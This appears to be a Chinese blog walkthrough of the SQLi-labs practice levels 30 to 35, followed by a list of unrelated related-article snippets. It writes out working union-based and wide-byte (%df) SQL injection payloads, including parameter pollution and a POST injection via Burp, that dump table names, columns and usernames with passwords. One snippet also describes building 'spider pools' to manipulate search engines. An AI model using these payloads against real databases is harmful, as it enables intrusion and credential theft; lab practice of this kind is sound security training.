sqlilabs第三十关到第三十五关靶场攻略

news/2024/12/24 19:41:15/

第三十关

第三十关和二十九关差不多,将单引号换成双引号

查询表名,字段名,数据

?id=1&id=-2" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

?id=1&id=-2" union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+

?id=1&id=-2" union select 1,group_concat(password,username),3 from users--+

第三十一关

查询数据库

查询表名

?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

普通的联合注入( 如果不行,可以尝试一下?id=1&id=-1") )

照正常流程走就好了

第三十二关(宽字节注入)

在1后面加%df让他成为一个字符

?id=-1%df' union select 1,2,database()--+

后面还是联合查询一样的流程

第三十三关

跟三十二一样都是宽字节注入\

?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273 --+

第三十四关

这关还是宽字节注入,可以到是POST提交

我们到bp重放器进行注入

admin%df' union select 1,group_concat(table_name)from information_schema.tables where table_schema=database() #

继续联合注入就行

第三十五关

数字型的宽字节注入但是这关不需要%df

直接联合注入就拿下这关

?id=-1 union select 1,2,database()--+

?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database() #

?id=-1 union select 1,2,group_concat(column_name)from information_schema.columns where table_schema=database() and table_name=0x7573657273 #


http://www.ppmy.cn/news/1557816.html

相关文章

搜索引擎蜘蛛池的原理是什么,蜘蛛池搭建教程(蜘蛛池.中国)

搜索引擎蜘蛛池的原理 模拟自然链接结构:通过大量域名和服务器资源创建众多站点页面,相互链接形成类似自然的庞大链接结构,吸引搜索引擎蜘蛛频繁访问. 制造活跃假象:蜘蛛池中的网页内容丰富且更新频繁,会让搜索引擎蜘…

前端项目发布后打开报错Uncaught SyntaxError: Unexpected token ‘<‘ (at chunk-vendors)

报错原因&#xff1a;请求js拿到的是一个非js脚本文件&#xff0c;因为请求没拿到正确路径。 如&#xff1a;我的项目是部署在www.a.com/web下&#xff0c;打包后index.html内请求的脚本默认是 <script src"/static/js/chunk-vendors.ea8a242f.js"></scrip…

STL源码剖析(侯捷版本) —— 第四章 序列式容器(三)

传送门 STL源码剖析(侯捷版本) —— 第一章 STL 概论与版本简介 STL源码剖析(侯捷版本) —— 第二章 空間配置器 allocator STL源码剖析(侯捷版本) —— 第三章 迭代器(Iterators)与Traits编程技巧在C STL中的应用 STL源码剖析(侯捷版本) —— 第四章 序列式容器&#xff08…

html+css网页设计 旅游 移动端 雪花旅行社4个页面

htmlcss网页设计 旅游 移动端 雪花旅行社4个页面 网页作品代码简单&#xff0c;可使用任意HTML辑软件&#xff08;如&#xff1a;Dreamweaver、HBuilder、Vscode 、Sublime 、Webstorm、Text 、Notepad 等任意html编辑软件进行运行及修改编辑等操作&#xff09;。 获取源码 …

PHP中实现拓扑算法

概念 拓扑算法是一个有向无线算法 是一个处理复杂关系的算法 应用场景 A BC B CD C AT 这里的值因为计算顺序不同&#xff0c;会导致计算结果不同&#xff0c;而拓扑排序就能解决这个问题&#xff0c;找出先计算那一位 环的概念 拓扑排序中的一个bug 如果 A BC B CD C…

R语言处理XML文件

R语言处理XML文件 XML&#xff08;可扩展标记语言&#xff09;是一种用于存储和传输数据的标记语言。在R语言中&#xff0c;处理XML文件是一项常见任务&#xff0c;因为它允许从各种数据源中提取和操作数据。本文将介绍如何在R中使用XML包来读取、解析和操作XML数据。 安装和…

Red Hat 8.1 部署MySQL 5.7

Red Hat 8.1 部署MySQL 5.7 文章目录 Red Hat 8.1 部署MySQL 5.7一、关闭防火墙和Selinux二 、配置 YUM 源三、安装依赖包四、安装 MySQL4.1 创建安装目录并解压文件到目录中4.2 创建快捷方式4.3 创建用户组4.4 初始化4.5 配置环境变量 五、 启动数据库5.1 后台启动&#xff0c…

【Javaweb】第一篇上,什么是web?

目录 1.什么是web&#xff1f; 2.web网站的工作流程 3.web网站的开发模式 1.前后端分离开发&#xff08;目前主流的企业开发模式&#xff09; 2.混合开发 4.web开发的技术栈 前端web开发&#xff1a; 后端web开发 1.什么是web&#xff1f; web&#xff08;World Wide…